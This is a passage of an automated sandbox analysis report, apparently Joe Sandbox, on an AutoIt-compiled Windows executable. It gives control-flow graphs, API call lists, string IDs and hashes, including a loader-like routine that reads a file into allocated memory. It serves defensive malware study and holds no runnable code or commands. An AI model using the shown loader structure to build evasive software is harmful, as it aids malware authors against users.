                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                            • String ID: #$0$AutoIt v3
                            • API String ID: 423443420-4155596026
                            • Opcode ID: 63af1e62e4b5de487008e4a62de8a3a3314405a00f334cbca9c0d83b6475e228
                            • Instruction ID: 525c219901ae6c75cf30178ea457061cd836592f6765240c618f93287ae1ac9e
                            • Opcode Fuzzy Hash: 63af1e62e4b5de487008e4a62de8a3a3314405a00f334cbca9c0d83b6475e228
                            • Instruction Fuzzy Hash: BA212A72900309AFEB11DFA5EC09B9E7FB1EB08711F100119F504B62B1D3B655988FA4

                            Control-flow Graph

                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R
                            • API String ID: 1825951767-347772802
                            • Opcode ID: 9eec894646505af898bfe7168073373b1fc89f423f626b58971f1dccfbb71fe4
                            • Instruction ID: ae5fc9ed34c14ccb0c0e738a3dd9fbe3702e5ec45acc28b989ae6c6935aa6d39
                            • Opcode Fuzzy Hash: 9eec894646505af898bfe7168073373b1fc89f423f626b58971f1dccfbb71fe4
                            • Instruction Fuzzy Hash: C0A13872910219ABCF04EBA4DC95AEEB779FF15310F44052AF416B7192EF749A48CBB0

                            Control-flow Graph

                            control_flow_graph 883 d43633-d43681 885 d436e1-d436e3 883->885 886 d43683-d43686 883->886 885->886 889 d436e5 885->889 887 d436e7 886->887 888 d43688-d4368f 886->888 890 d436ed-d436f0 887->890 891 d7d0cc-d7d0fa call d51070 call d51093 887->891 892 d43695-d4369a 888->892 893 d4374b-d43753 PostQuitMessage 888->893 894 d436ca-d436d2 DefWindowProcW 889->894 895 d43715-d4373c SetTimer RegisterWindowMessageW 890->895 896 d436f2-d436f3 890->896 930 d7d0ff-d7d106 891->930 898 d7d154-d7d168 call da2527 892->898 899 d436a0-d436a2 892->899 900 d43711-d43713 893->900 901 d436d8-d436de 894->901 895->900 905 d4373e-d43749 CreatePopupMenu 895->905 902 d7d06f-d7d072 896->902 903 d436f9-d4370c KillTimer call d4443a call d43114 896->903 898->900 922 d7d16e 898->922 906 d43755-d43764 call d444a0 899->906 907 d436a8-d436ad 899->907 900->901 915 d7d074-d7d076 902->915 916 d7d0a8-d7d0c7 MoveWindow 902->916 903->900 905->900 906->900 911 d436b3-d436b8 907->911 912 d7d139-d7d140 907->912 920 d7d124-d7d134 call da2d36 911->920 921 d436be-d436c4 911->921 912->894 918 d7d146-d7d14f call d97c36 912->918 924 d7d097-d7d0a3 SetFocus 915->924 925 d7d078-d7d07b 915->925 916->900 918->894 920->900 921->894 921->930 922->894 924->900 925->921 926 d7d081-d7d092 call d51070 925->926 926->900 930->894 934 d7d10c-d7d11f call d4443a call d4434a 930->934 934->894
                            APIs
                            • DefWindowProcW.USER32(?,?,?,?), ref: 00D436D2
                            • KillTimer.USER32 ref: 00D436FC
                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D4371F
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D4372A
                            • CreatePopupMenu.USER32 ref: 00D4373E
                            • PostQuitMessage.USER32(00000000), ref: 00D4374D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                            • String ID: TaskbarCreated
                            • API String ID: 129472671-2362178303
                            • Opcode ID: b0bfecb78e3df9b8a06ab1fb044fe6f94a675782e02a1c81022befc4c322347a
                            • Instruction ID: 9fc67cc320a0e81d6a42205206c492ac7745634da5593b8694b353e6b532630e
                            • Opcode Fuzzy Hash: b0bfecb78e3df9b8a06ab1fb044fe6f94a675782e02a1c81022befc4c322347a
                            • Instruction Fuzzy Hash: 874107B2200607EFDF146F6CDC0EBBA3666EB00340F584125F946A63E2DA619E949B71

                            Control-flow Graph

                            control_flow_graph 940 9940e8-994196 call 991b08 943 99419d-9941c3 call 994ff8 CreateFileW 940->943 946 9941ca-9941da 943->946 947 9941c5 943->947 955 9941dc 946->955 956 9941e1-9941fb VirtualAlloc 946->956 948 994315-994319 947->948 949 99435b-99435e 948->949 950 99431b-99431f 948->950 952 994361-994368 949->952 953 99432b-99432f 950->953 954 994321-994324 950->954 959 99436a-994375 952->959 960 9943bd-9943d2 952->960 961 99433f-994343 953->961 962 994331-99433b 953->962 954->953 955->948 957 9941fd 956->957 958 994202-994219 ReadFile 956->958 957->948 963 99421b 958->963 964 994220-994260 VirtualAlloc 958->964 965 994379-994385 959->965 966 994377 959->966 967 9943e2-9943ea 960->967 968 9943d4-9943df VirtualFree 960->968 969 994353 961->969 970 994345-99434f 961->970 962->961 963->948 971 994262 964->971 972 994267-994282 call 995248 964->972 973 994399-9943a5 965->973 974 994387-994397 965->974 966->960 968->967 969->949 970->969 971->948 980 99428d-994297 972->980 977 9943b2-9943b8 973->977 978 9943a7-9943b0 973->978 976 9943bb 974->976 976->952 977->976 978->976 981 994299-9942c8 call 995248 980->981 982 9942ca-9942de call 995058 980->982 981->980 987 9942e0 982->987 988 9942e2-9942e6 982->988 987->948 990 9942e8-9942ec CloseHandle 988->990 991 9942f2-9942f6 988->991 990->991 992 9942f8-994303 VirtualFree 991->992 993 994306-99430f 991->993 992->993 993->943 993->948
                            APIs
                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 009941B9
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009943DF
                            Memory Dump Source
                            • Source File: 00000005.00000002.486369482.0000000000991000.00000040.00000020.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_991000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CreateFileFreeVirtual
                            • String ID:
                            • API String ID: 204039940-0
                            • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                            • Instruction ID: bc7c4de97dfbc4766a9c251b37f243d7e04a6864eb701245eac88faabc8e1dca
                            • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                            • Instruction Fuzzy Hash: 1FA11774E00209EBDF15CFA8C985FEEB7B5BF48305F208559E615BB280D7799A81CB90

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00D60162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D60193
                              • Part of subcall function 00D60162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D6019B
                              • Part of subcall function 00D60162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D601A6
                              • Part of subcall function 00D60162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D601B1
                              • Part of subcall function 00D60162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D601B9
                              • Part of subcall function 00D60162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D601C1
                              • Part of subcall function 00D560F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00D4F930), ref: 00D56154
                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D4F9CD
                            • OleInitialize.OLE32(00000000), ref: 00D4FA4A
                            • CloseHandle.KERNEL32(00000000), ref: 00D845C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                            • String ID: <W$\T$S
                            • API String ID: 1986988660-80204951
                            • Opcode ID: fe83b25942b4cebba031d843173126d31e6f1b25aa9552398dff5e1f844ba958
                            • Instruction ID: 3b40b4f7f771125dc155a312cac9f2276cb33e3936b4ab01eab1e65d8e81c142
                            • Opcode Fuzzy Hash: fe83b25942b4cebba031d843173126d31e6f1b25aa9552398dff5e1f844ba958
                            • Instruction Fuzzy Hash: E281D1B2801B40CFC784DF6AAC4569B7BE5FB98306754912AD42AE7361E77648CC8F21

                            Control-flow Graph

                            control_flow_graph 1112 d439d5-d43a45 CreateWindowExW * 2 ShowWindow * 2
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$CreateShow
                            • String ID: AutoIt v3$edit
                            • API String ID: 1584632944-3779509399
                            • Opcode ID: b53b1c3685c0d73f921edd50ec82828c1761eb0fb6f93b6c3b8982cc1cd407b5
                            • Instruction ID: 14b46fc2f2b26b26be92a1e32c5a18218ca730e4461bcb4107dec8a06797a290
                            • Opcode Fuzzy Hash: b53b1c3685c0d73f921edd50ec82828c1761eb0fb6f93b6c3b8982cc1cd407b5
                            • Instruction Fuzzy Hash: F2F0DA72541695BFEA3157276C4DF6B2E7EDBC6F50B00412EB904F22B0C6721895DEB0

                            Control-flow Graph

                            control_flow_graph 1113 993eb8-993fe0 call 991b08 call 993da8 CreateFileW 1120 993fe2 1113->1120 1121 993fe7-993ff7 1113->1121 1122 994097-99409c 1120->1122 1124 993ff9 1121->1124 1125 993ffe-994018 VirtualAlloc 1121->1125 1124->1122 1126 99401a 1125->1126 1127 99401c-994033 ReadFile 1125->1127 1126->1122 1128 994035 1127->1128 1129 994037-994071 call 993de8 call 992da8 1127->1129 1128->1122 1134 99408d-994095 ExitProcess 1129->1134 1135 994073-994088 call 993e38 1129->1135 1134->1122 1135->1134
                            APIs
                              • Part of subcall function 00993DA8: Sleep.KERNELBASE(000001F4), ref: 00993DB9
                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00993FD6
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486369482.0000000000991000.00000040.00000020.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_991000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CreateFileSleep
                            • String ID: K07L25CJ2DRME
                            • API String ID: 2694422964-835341977
                            • Opcode ID: ad437d35e296375cba8f4e0f471cbaf24887b03f33d6e9a8143bde40257624d7
                            • Instruction ID: 1c32745ca408c755a9a1782df8626c5a0054baff834a4271c5f48407edb29c9b
                            • Opcode Fuzzy Hash: ad437d35e296375cba8f4e0f471cbaf24887b03f33d6e9a8143bde40257624d7
                            • Instruction Fuzzy Hash: F1519171D04249EBEF21DBB8C855BEEBB79AF59300F004599E609BB2C0D7790B05CBA5

                            Control-flow Graph

                            control_flow_graph 1137 d4407c-d44092 1138 d4416f-d44173 1137->1138 1139 d44098-d440ad call d47a16 1137->1139 1142 d440b3-d440d3 call d47bcc 1139->1142 1143 d7d3c8-d7d3d7 LoadStringW 1139->1143 1146 d7d3e2-d7d3fa call d47b2e call d46fe3 1142->1146 1147 d440d9-d440dd 1142->1147 1143->1146 1156 d440ed-d4416a call d62de0 call d4454e call d62dbc Shell_NotifyIconW call d45904 1146->1156 1159 d7d400-d7d41e call d47cab call d46fe3 call d47cab 1146->1159 1149 d44174-d4417d call d48047 1147->1149 1150 d440e3-d440e8 call d47b2e 1147->1150 1149->1156 1150->1156 1156->1138 1159->1156
                            APIs
                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D7D3D7
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            • _memset.LIBCMT ref: 00D440FC
                            • _wcscpy.LIBCMT ref: 00D44150
                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D44160
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                            • String ID: Line:
                            • API String ID: 3942752672-1585850449
                            • Opcode ID: 924b73db2694998b13a8c64c27e05b49fea7e085208deae81377ee7f68370dc7
                            • Instruction ID: d342d3014c6b7e8e4a93ed3e92a4b21cf6ceef70fcf7e4e0f94a842c1e33b8af
                            • Opcode Fuzzy Hash: 924b73db2694998b13a8c64c27e05b49fea7e085208deae81377ee7f68370dc7
                            • Instruction Fuzzy Hash: 8731A172008705AFD721EB60DC46FEB77E8EF44310F14451EF589A21A1EB709688CBB2

                            Control-flow Graph

                            control_flow_graph 1172 d6541d-d65436 1173 d65453 1172->1173 1174 d65438-d6543d 1172->1174 1176 d65455-d6545b 1173->1176 1174->1173 1175 d6543f-d65441 1174->1175 1177 d65443-d65448 call d68b28 1175->1177 1178 d6545c-d65461 1175->1178 1188 d6544e call d68db6 1177->1188 1180 d65463-d6546d 1178->1180 1181 d6546f-d65473 1178->1181 1180->1181 1183 d65493-d654a2 1180->1183 1184 d65475-d65480 call d62de0 1181->1184 1185 d65483-d65485 1181->1185 1186 d654a4-d654a7 1183->1186 1187 d654a9 1183->1187 1184->1185 1185->1177 1190 d65487-d65491 1185->1190 1191 d654ae-d654b3 1186->1191 1187->1191 1188->1173 1190->1177 1190->1183 1194 d6559c-d6559f 1191->1194 1195 d654b9-d654c0 1191->1195 1194->1176 1196 d654c2-d654ca 1195->1196 1197 d65501-d65503 1195->1197 1196->1197 1198 d654cc 1196->1198 1199 d65505-d65507 1197->1199 1200 d6556d-d6556e call d70ba7 1197->1200 1201 d654d2-d654d4 1198->1201 1202 d655ca 1198->1202 1203 d6552b-d65536 1199->1203 1204 d65509-d65511 1199->1204 1208 d65573-d65577 1200->1208 1211 d654d6-d654d8 1201->1211 1212 d654db-d654e0 1201->1212 1213 d655ce-d655d7 1202->1213 1209 d6553a-d6553d 1203->1209 1210 d65538 1203->1210 1206 d65513-d6551f 1204->1206 1207 d65521-d65525 1204->1207 1214 d65527-d65529 1206->1214 1207->1214 1208->1213 1215 d65579-d6557e 1208->1215 1216 d655a4-d655a8 1209->1216 1217 d6553f-d6554b call d646e6 call d70e5b 1209->1217 1210->1209 1211->1212 1212->1216 1218 d654e6-d654ff call d70cc8 1212->1218 1213->1176 1214->1209 1215->1216 1219 d65580-d65591 1215->1219 1220 d655ba-d655c5 call d68b28 1216->1220 1221 d655aa-d655b7 call d62de0 1216->1221 1233 d65550-d65555 1217->1233 1232 d65562-d6556b 1218->1232 1224 d65594-d65596 1219->1224 1220->1188 1221->1220 1224->1194 1224->1195 1232->1224 1234 d655dc-d655e0 1233->1234 1235 d6555b-d6555e 1233->1235 1234->1213 1235->1202 1236 d65560 1235->1236 1236->1232
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                            • String ID:
                            • API String ID: 1559183368-0
                            • Opcode ID: 2ae4adc1162bedfe6bc9a4b740345a455ff32de3de61d0c655ced6f3c4ec0989
                            • Instruction ID: d8ba2ff9678fc9d46f31e3e01224b78ba18f6ad96c415bd17a3b6fc5e97f9729
                            • Opcode Fuzzy Hash: 2ae4adc1162bedfe6bc9a4b740345a455ff32de3de61d0c655ced6f3c4ec0989
                            • Instruction Fuzzy Hash: CD51B870A00B05DBCB24CF69E84466E77A6EF40321F288769F876962D8DB71DDD08B70

                            Control-flow Graph

                            control_flow_graph 2036 d4686a-d46891 call d44ddd 2039 d46897-d468a5 call d44ddd 2036->2039 2040 d7e031-d7e041 call da955b 2036->2040 2039->2040 2047 d468ab-d468b1 2039->2047 2043 d7e046-d7e048 2040->2043 2045 d7e067-d7e0af call d60db6 2043->2045 2046 d7e04a-d7e04d call d44e4a 2043->2046 2056 d7e0d4 2045->2056 2057 d7e0b1-d7e0bb 2045->2057 2051 d7e052-d7e061 call da42f8 2046->2051 2050 d468b7-d468d9 call d46a8c 2047->2050 2047->2051 2051->2045 2059 d7e0d6-d7e0e9 2056->2059 2060 d7e0cf-d7e0d0 2057->2060 2061 d7e260-d7e271 call d62d55 call d44e4a 2059->2061 2062 d7e0ef 2059->2062 2063 d7e0d2 2060->2063 2064 d7e0bd-d7e0cc 2060->2064 2073 d7e273-d7e283 call d47616 call d45d9b 2061->2073 2065 d7e0f6-d7e0f9 call d47480 2062->2065 2063->2059 2064->2060 2069 d7e0fe-d7e120 call d45db2 call da73e9 2065->2069 2080 d7e134-d7e13e call da73d3 2069->2080 2081 d7e122-d7e12f 2069->2081 2087 d7e288-d7e2b8 call d9f7a1 call d60e2c call d62d55 call d44e4a 2073->2087 2089 d7e140-d7e153 2080->2089 2090 d7e158-d7e162 call da73bd 2080->2090 2083 d7e227-d7e237 call d4750f 2081->2083 2083->2069 2092 d7e23d-d7e25a call d4735d 2083->2092 2087->2073 2089->2083 2097 d7e176-d7e180 call d45e2a 2090->2097 2098 d7e164-d7e171 2090->2098 2092->2061 2092->2065 2097->2083 2105 d7e186-d7e19e call d9f73d 2097->2105 2098->2083 2111 d7e1c1-d7e1c4 2105->2111 2112 d7e1a0-d7e1bf call d47de1 call d45904 2105->2112 2113 d7e1c6-d7e1e1 call d47de1 call d46839 call d45904 2111->2113 2114 d7e1f2-d7e1f5 2111->2114 2137 d7e1e2-d7e1f0 call d45db2 2112->2137 2113->2137 2118 d7e1f7-d7e200 call d9f65e 2114->2118 2119 d7e215-d7e218 call da737f 2114->2119 2118->2087 2130 d7e206-d7e210 call d60e2c 2118->2130 2124 d7e21d-d7e226 call d60e2c 2119->2124 2124->2083 2130->2069 2137->2124
                            APIs
                              • Part of subcall function 00D44DDD: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00E052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00D44E0F
                            • _free.LIBCMT ref: 00D7E263
                            • _free.LIBCMT ref: 00D7E2AA
                              • Part of subcall function 00D46A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00D46BAD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _free$CurrentDirectoryLibraryLoad
                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                            • API String ID: 2861923089-1757145024
                            • Opcode ID: 420e196265a87edfc225ab749a7c4ea142144fde0953fe293c7d12f44d5bbc5a
                            • Instruction ID: ae0ca498496fb65b94307cb7f41618eea0cbce943fdf1ca67218ed38fc737370
                            • Opcode Fuzzy Hash: 420e196265a87edfc225ab749a7c4ea142144fde0953fe293c7d12f44d5bbc5a
                            • Instruction Fuzzy Hash: CB9160719002199FCF04EFA4CC919EDB7B9FF09310F148469F81AAB2A2EB719945CB70
                            APIs
                            • RegOpenKeyExW.KERNEL32 ref: 00D435D4
                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00D435F5
                            • RegCloseKey.ADVAPI32(00000000), ref: 00D43617
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID: Control Panel\Mouse
                            • API String ID: 3677997916-824357125
                            • Opcode ID: ed1829bc00798a8ecbda3036d878ed25fc3d76af8036f999efcb163d05edc541
                            • Instruction ID: e46b1f365048463a0c9b2a32740bf2042e3a3a60c745d70dc32977cb87778b23
                            • Opcode Fuzzy Hash: ed1829bc00798a8ecbda3036d878ed25fc3d76af8036f999efcb163d05edc541
                            • Instruction Fuzzy Hash: 3E11577161020ABFDB209F68DC80EEEBBB9EF04740F128469F805D7210E2719F40ABB0
                            APIs
                              • Part of subcall function 00D44EE5: _fseek.LIBCMT ref: 00D44EFD
                              • Part of subcall function 00DA9734: _wcscmp.LIBCMT ref: 00DA9824
                              • Part of subcall function 00DA9734: _wcscmp.LIBCMT ref: 00DA9837
                            • _free.LIBCMT ref: 00DA96A2
                            • _free.LIBCMT ref: 00DA96A9
                            • _free.LIBCMT ref: 00DA9714
                              • Part of subcall function 00D62D55: HeapFree.KERNEL32(00000000,00000000), ref: 00D62D69
                              • Part of subcall function 00D62D55: GetLastError.KERNEL32(00000000,?,00D69A24), ref: 00D62D7B
                            • _free.LIBCMT ref: 00DA971C
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                            • String ID:
                            • API String ID: 1552873950-0
                            • Opcode ID: f859ffca5ba2b4a0eea839192ff175ec825e65a9e51aeda56b8df4c59dab3bfe
                            • Instruction ID: 6e187475401ebaa6de85411c421647379216d3df3cc4a7ff6e26a9b3cecd2003
                            • Opcode Fuzzy Hash: f859ffca5ba2b4a0eea839192ff175ec825e65a9e51aeda56b8df4c59dab3bfe
                            • Instruction Fuzzy Hash: 6B514EB1D14258ABDF259F64DC81BAEBB79EF49300F1004AEF609A3241DB715A80CF78
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                            • String ID:
                            • API String ID: 2782032738-0
                            • Opcode ID: b86a2bf7579e7a03abf9a7817f5cbb14d02551d5049f523e8648adc105e96e29
                            • Instruction ID: e9588ce0e9dd0195ec21623012a1c0105a1b70ba7336dc9142b4136726d509a5
                            • Opcode Fuzzy Hash: b86a2bf7579e7a03abf9a7817f5cbb14d02551d5049f523e8648adc105e96e29
                            • Instruction Fuzzy Hash: 0E41C675B00746DFDB18DFA9C8909AE7BA6EF46360B28853DE855C7640DB70DD408BB0
                            APIs
                            • _memset.LIBCMT ref: 00D7EA39
                            • GetOpenFileNameW.COMDLG32(?), ref: 00D7EA83
                              • Part of subcall function 00D44750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D44743,?,?,00D437AE,?), ref: 00D44770
                              • Part of subcall function 00D60791: GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,00D472BD,00000001,00E06290,?,00D43BBB,00E052F8,00E052E0,?,?), ref: 00D607B0
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
